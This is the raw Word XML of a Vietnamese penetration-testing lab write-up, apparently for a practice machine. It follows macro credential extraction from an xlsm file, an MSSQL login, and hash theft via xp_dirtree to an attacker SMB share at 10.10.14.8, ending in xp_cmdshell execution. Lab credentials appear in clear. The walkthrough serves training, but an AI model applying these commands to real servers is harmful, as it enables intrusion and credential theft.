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F8B940" w14:textId="2E426C74" w:rsidR="002F49FE" w:rsidRDefault="00F77775">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DA8B846" wp14:editId="3913236A">
            <wp:extent cx="5943600" cy="365379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77AE7" w14:textId="4BD08DBA" w:rsidR="00F77775" w:rsidRDefault="00F77775"/>
    <w:p w14:paraId="1AD9F5DC" w14:textId="5E800D2D" w:rsidR="00CF7853" w:rsidRDefault="00E41A5B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44DA9F2F" wp14:editId="7CB8F446">
            <wp:extent cx="4978400" cy="19431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840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658FA" w14:textId="4A1062A9" w:rsidR="00E41A5B" w:rsidRDefault="00E41A5B"/>
    <w:p w14:paraId="71A5C056" w14:textId="7C017E6E" w:rsidR="00E41A5B" w:rsidRDefault="00266AB4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60DC49E" wp14:editId="0DE742FC">
            <wp:extent cx="5943600" cy="155575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C4DB3" w14:textId="501DC316" w:rsidR="00266AB4" w:rsidRDefault="00266AB4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D214E3" w14:textId="1FEA2F7E" w:rsidR="00266AB4" w:rsidRDefault="000D354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Có 1 tập tin xlsm </w:t>
      </w:r>
      <w:r w:rsidR="00382970">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực thi macro Excel spreadsheet. Tải về để kiểm tra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762CA82C" w14:textId="2A3C910E" w:rsidR="00033C5B" w:rsidRDefault="00033C5B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70957D4E" w14:textId="1C547955" w:rsidR="00033C5B" w:rsidRDefault="00033C5B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00033C5B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Phân tích macros trong Excel wordbook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng cách unzip và chạy lệnh strings trên tệp nhị phân macro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3363BDD9" w14:textId="1476EA74" w:rsidR="00382970" w:rsidRDefault="00382970">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C11292" w14:textId="77777777" w:rsidR="00A223A2" w:rsidRDefault="006C4B2F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6430EFC5" wp14:editId="5F65725B">
            <wp:extent cx="4318000" cy="27432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80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D31CF" w14:textId="4A62EA3D" w:rsidR="00A223A2" w:rsidRDefault="00A223A2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310D1598" w14:textId="6FBF7816" w:rsidR="00382970" w:rsidRDefault="00A223A2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A223A2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Luis\Desktop\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6EC567" w14:textId="52F55887" w:rsidR="00033C5B" w:rsidRDefault="00033C5B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68AD117C" w14:textId="2F970894" w:rsidR="00A223A2" w:rsidRPr="004653B7" w:rsidRDefault="004F12B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004653B7">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strings xl/vbaProject.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DBAD79" w14:textId="5B9AEF3F" w:rsidR="00BA1D81" w:rsidRDefault="00BA1D81">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D91A21" w14:textId="404972B5" w:rsidR="00BA1D81" w:rsidRDefault="00046961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5CC2725A" wp14:editId="29DF817C">
            <wp:extent cx="5943600" cy="426085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7713E" w14:textId="37401856" w:rsidR="004653B7" w:rsidRDefault="004653B7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F279A7" w14:textId="06A19271" w:rsidR="004653B7" w:rsidRDefault="00046961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reporting</w:t>
      </w:r>
      <w:r w:rsidR="004653B7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="004653B7" w:rsidRPr="004653B7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PcwTWTHRwryjc$c6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BBE95" w14:textId="00A41EA8" w:rsidR="00074CA6" w:rsidRDefault="00074CA6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3338C6BC" w14:textId="193020A9" w:rsidR="00FB1D55" w:rsidRPr="00FB1D55" w:rsidRDefault="00FB1D55">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB1D55">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 mssqlclient.py reporting:PcwTWTHRwryjc$c6@10.10.10.125 -windo</w:t>
      </w:r>
      <w:r w:rsidR="0041065C">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB1D55">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s-auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68515D98" w14:textId="5442558E" w:rsidR="00074CA6" w:rsidRDefault="00074CA6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4DFB0AEE" wp14:editId="3650C92B">
            <wp:extent cx="5943600" cy="263525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AF19F" w14:textId="77777777" w:rsidR="00FB1D55" w:rsidRDefault="00FB1D55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06FE1260" w14:textId="7003FC82" w:rsidR="00046961" w:rsidRDefault="005A2609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Chúng ta có thể dùng xp_cmdshell để thực thi lệnh qua sql server: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E85622" w14:textId="1F0869AD" w:rsidR="000C757E" w:rsidRDefault="005A2609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0DEDD9B5" wp14:editId="2D02267E">
            <wp:extent cx="5943600" cy="36131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ACD7E" w14:textId="1F3A24BB" w:rsidR="005A2609" w:rsidRDefault="005A2609">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="149FD821" w14:textId="79EBF3D3" w:rsidR="005A2609" w:rsidRDefault="005A2609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Tuy nhiên, chúng ta bị từ chối truy cập. Chúng ta không phải là người dùng sa và không có đủ đặc quyền để thực thi xp_cmdshell. Hãy xem những người dùng có đặc quyền sa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF5E4BA" w14:textId="5354B62B" w:rsidR="005A2609" w:rsidRDefault="005A2609">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73DD8089" w14:textId="31E72F0F" w:rsidR="005A2609" w:rsidRDefault="00CC2C2D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283C7CDF" wp14:editId="57BE12E1">
            <wp:extent cx="5943600" cy="633730"/>
            <wp:effectExtent l="0" t="0" r="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52CD1" w14:textId="1A9503A7" w:rsidR="00CC2C2D" w:rsidRDefault="00CC2C2D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC4C1BF" w14:textId="221CE31B" w:rsidR="00827301" w:rsidRDefault="00C37D52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Chúng ta không có đặc quyền SA. Mặc dù chúng ta không thực thi lệnh được bằng xp_cmdshell, chúng ta có thể đánh cắp hashes của dịch vụ sql bằng xp_dirtree</w:t>
      </w:r>
      <w:r w:rsidR="00827301">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc xp_fileexist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49414F9C" w14:textId="6997F47A" w:rsidR="00827301" w:rsidRDefault="00827301">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058AE03D" w14:textId="3208E142" w:rsidR="00827301" w:rsidRPr="000A5619" w:rsidRDefault="00184F32">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A5619">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec xp_dirtree '\\10.10.14.8\kali'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B66D08" w14:textId="626949CE" w:rsidR="00184F32" w:rsidRDefault="00184F32">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4151AD" w14:textId="36410CAD" w:rsidR="000A5619" w:rsidRPr="000A5619" w:rsidRDefault="000A5619">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A5619">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 smbserver.py kali . -smb2support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A2C17" w14:textId="78901D10" w:rsidR="00184F32" w:rsidRDefault="000A5619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465C942E" wp14:editId="3AD04163">
            <wp:extent cx="5943600" cy="226695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7F54F" w14:textId="6B4AB356" w:rsidR="000A5619" w:rsidRDefault="000A5619">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BCEC9B4" w14:textId="78DF9114" w:rsidR="000A5619" w:rsidRDefault="00432D1E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32463E2F" wp14:editId="548E79B2">
            <wp:extent cx="5943600" cy="17665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DB04A" w14:textId="74F0E2D1" w:rsidR="00432D1E" w:rsidRDefault="00432D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583A6742" w14:textId="47A96563" w:rsidR="00432D1E" w:rsidRPr="00F1753C" w:rsidRDefault="00292DE9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1753C">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mssql-svc:corporate568</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E26DC81" w14:textId="13E61B3B" w:rsidR="00292DE9" w:rsidRDefault="00292DE9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DAF5C27" w14:textId="5D13FFCB" w:rsidR="00292DE9" w:rsidRDefault="000A2EC7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104777BF" wp14:editId="20CB5E86">
            <wp:extent cx="5943600" cy="3513455"/>
            <wp:effectExtent l="0" t="0" r="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8EBCE" w14:textId="7F8B2E99" w:rsidR="000A2EC7" w:rsidRDefault="000A2EC7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1987B1F3" w14:textId="320426A1" w:rsidR="000A2EC7" w:rsidRDefault="000A2EC7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mssql-svc là người dùng sa, có thể thực thi xp_cmdshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644ABC90" w14:textId="2230C47E" w:rsidR="00027888" w:rsidRDefault="00027888">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43EEE9FE" w14:textId="6ED99B66" w:rsidR="00027888" w:rsidRDefault="00027888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38161276" wp14:editId="1E639F0E">
            <wp:extent cx="5943600" cy="301625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B848D" w14:textId="1536A847" w:rsidR="00027888" w:rsidRDefault="00027888">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE279A4" w14:textId="77777777" w:rsidR="00027888" w:rsidRDefault="00027888">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FDF42B9" w14:textId="0A3268EB" w:rsidR="000A2EC7" w:rsidRDefault="00FF036B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012998D8" wp14:editId="6D5861F8">
            <wp:extent cx="5943600" cy="1510665"/>
            <wp:effectExtent l="0" t="0" r="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FC6DA" w14:textId="77777777" w:rsidR="00C802B4" w:rsidRDefault="00C802B4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAF6160" w14:textId="7F2E6844" w:rsidR="00066AB8" w:rsidRDefault="00C802B4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3262FB74" wp14:editId="59C2332F">
            <wp:extent cx="3467100" cy="4953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D38AD" w14:textId="77777777" w:rsidR="0007485A" w:rsidRDefault="0007485A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0602FE" w14:textId="77777777" w:rsidR="0007485A" w:rsidRDefault="0007485A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4066BF3E" w14:textId="77777777" w:rsidR="0007485A" w:rsidRDefault="0007485A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274C968C" w14:textId="77777777" w:rsidR="0007485A" w:rsidRDefault="0007485A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4826189A" w14:textId="77777777" w:rsidR="0007485A" w:rsidRDefault="0007485A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479F28B1" w14:textId="35154B8B" w:rsidR="00066AB8" w:rsidRDefault="00066AB8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 xml:space="preserve">Tập tin </w:t>
      </w:r>
      <w:r w:rsidR="00310E1B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>độc hại</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bị phần mềm antivirus chặn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BCE161" w14:textId="0CFFDA28" w:rsidR="000A2EC7" w:rsidRDefault="00066AB8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5D43F4BA" wp14:editId="2F9C51E1">
            <wp:extent cx="5943600" cy="910590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0EF05" w14:textId="77BE7F62" w:rsidR="00310E1B" w:rsidRDefault="00310E1B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D62F66" w14:textId="70980357" w:rsidR="0007485A" w:rsidRDefault="00944684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Mình sẽ tải bằng dịch vụ mssql:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30731696" w14:textId="266A95F5" w:rsidR="003D49B2" w:rsidRDefault="003D49B2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13BB4191" wp14:editId="5C66D8CC">
            <wp:extent cx="5943600" cy="874395"/>
            <wp:effectExtent l="0" t="0" r="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7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B24DC" w14:textId="7C91E874" w:rsidR="00D95151" w:rsidRDefault="00D95151">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="048FB6DC" w14:textId="6207A57A" w:rsidR="00D95151" w:rsidRDefault="00ED37AC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0750FA51" wp14:editId="2B4C3A70">
            <wp:extent cx="5943600" cy="2548890"/>
            <wp:effectExtent l="0" t="0" r="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4327A" w14:textId="50F16782" w:rsidR="00ED37AC" w:rsidRDefault="00ED37AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="581CC35C" w14:textId="2C41C5A0" w:rsidR="00ED37AC" w:rsidRDefault="00271F15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067459E6" wp14:editId="59C9C2C4">
            <wp:extent cx="3759200" cy="5842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9200" cy="58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75E98" w14:textId="3704D465" w:rsidR="00271F15" w:rsidRDefault="00271F15">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F55052D" w14:textId="35F67729" w:rsidR="00271F15" w:rsidRDefault="00A5713C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46099C4C" wp14:editId="300E76F6">
            <wp:extent cx="5943600" cy="123444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637C9" w14:textId="5FD6F654" w:rsidR="00A5713C" w:rsidRDefault="00A5713C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B4EC53" w14:textId="48C470D9" w:rsidR="00A5713C" w:rsidRDefault="00EC62D7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51859D46" wp14:editId="6E488614">
            <wp:extent cx="5943600" cy="208470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A1903" w14:textId="710E5C4E" w:rsidR="00C70A49" w:rsidRDefault="00C70A49">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746193BF" w14:textId="5ED835DB" w:rsidR="005E1B17" w:rsidRDefault="00FD7024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462311A9" wp14:editId="3439C4E5">
            <wp:extent cx="5943600" cy="529590"/>
            <wp:effectExtent l="0" t="0" r="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E1B1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0E668E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0409001D"/>
    <w:styleLink w:val="Style1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2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
      </w:r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0639"/>
    <w:rsid w:val="00027888"/>
    <w:rsid w:val="00033C5B"/>
    <w:rsid w:val="00046961"/>
    <w:rsid w:val="00066AB8"/>
    <w:rsid w:val="0007485A"/>
    <w:rsid w:val="00074CA6"/>
    <w:rsid w:val="000A2EC7"/>
    <w:rsid w:val="000A5619"/>
    <w:rsid w:val="000C757E"/>
    <w:rsid w:val="000D354B"/>
    <w:rsid w:val="00184F32"/>
    <w:rsid w:val="001D3C16"/>
    <w:rsid w:val="00266AB4"/>
    <w:rsid w:val="00271F15"/>
    <w:rsid w:val="00292DE9"/>
    <w:rsid w:val="0029596F"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00310E1B"/>
    <w:rsid w:val="00382970"/>
    <w:rsid w:val="003D49B2"/>
    <w:rsid w:val="0041065C"/>
    <w:rsid w:val="00432D1E"/>
    <w:rsid w:val="004653B7"/>
    <w:rsid w:val="004F12B8"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005A2609"/>
    <w:rsid w:val="005E1B17"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="006C4B2F"/>
    <w:rsid w:val="00827301"/>
    <w:rsid w:val="00944684"/>
    <w:rsid w:val="00A223A2"/>
    <w:rsid w:val="00A5713C"/>
    <w:rsid w:val="00BA1D81"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C37D52"/>
    <w:rsid w:val="00C70A49"/>
    <w:rsid w:val="00C802B4"/>
    <w:rsid w:val="00CC2C2D"/>
    <w:rsid w:val="00CF7853"/>
    <w:rsid w:val="00D41A22"/>
    <w:rsid w:val="00D42EAA"/>
    <w:rsid w:val="00D95151"/>
    <w:rsid w:val="00E41A5B"/>
    <w:rsid w:val="00EB0639"/>
    <w:rsid w:val="00EC62D7"/>
    <w:rsid w:val="00ED37AC"/>
    <w:rsid w:val="00F1753C"/>
    <w:rsid w:val="00F77775"/>
    <w:rsid w:val="00FB1D55"/>
    <w:rsid w:val="00FD7024"/>
    <w:rsid w:val="00FF03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V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71E2ADD9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{910AD648-D46B-2C44-9E79-FE7AE3508E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V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numbering" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="Style1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BD107F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1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7</Pages>
  <Words>155</Words>
  <Characters>888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45</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-26T03:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-29T03:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>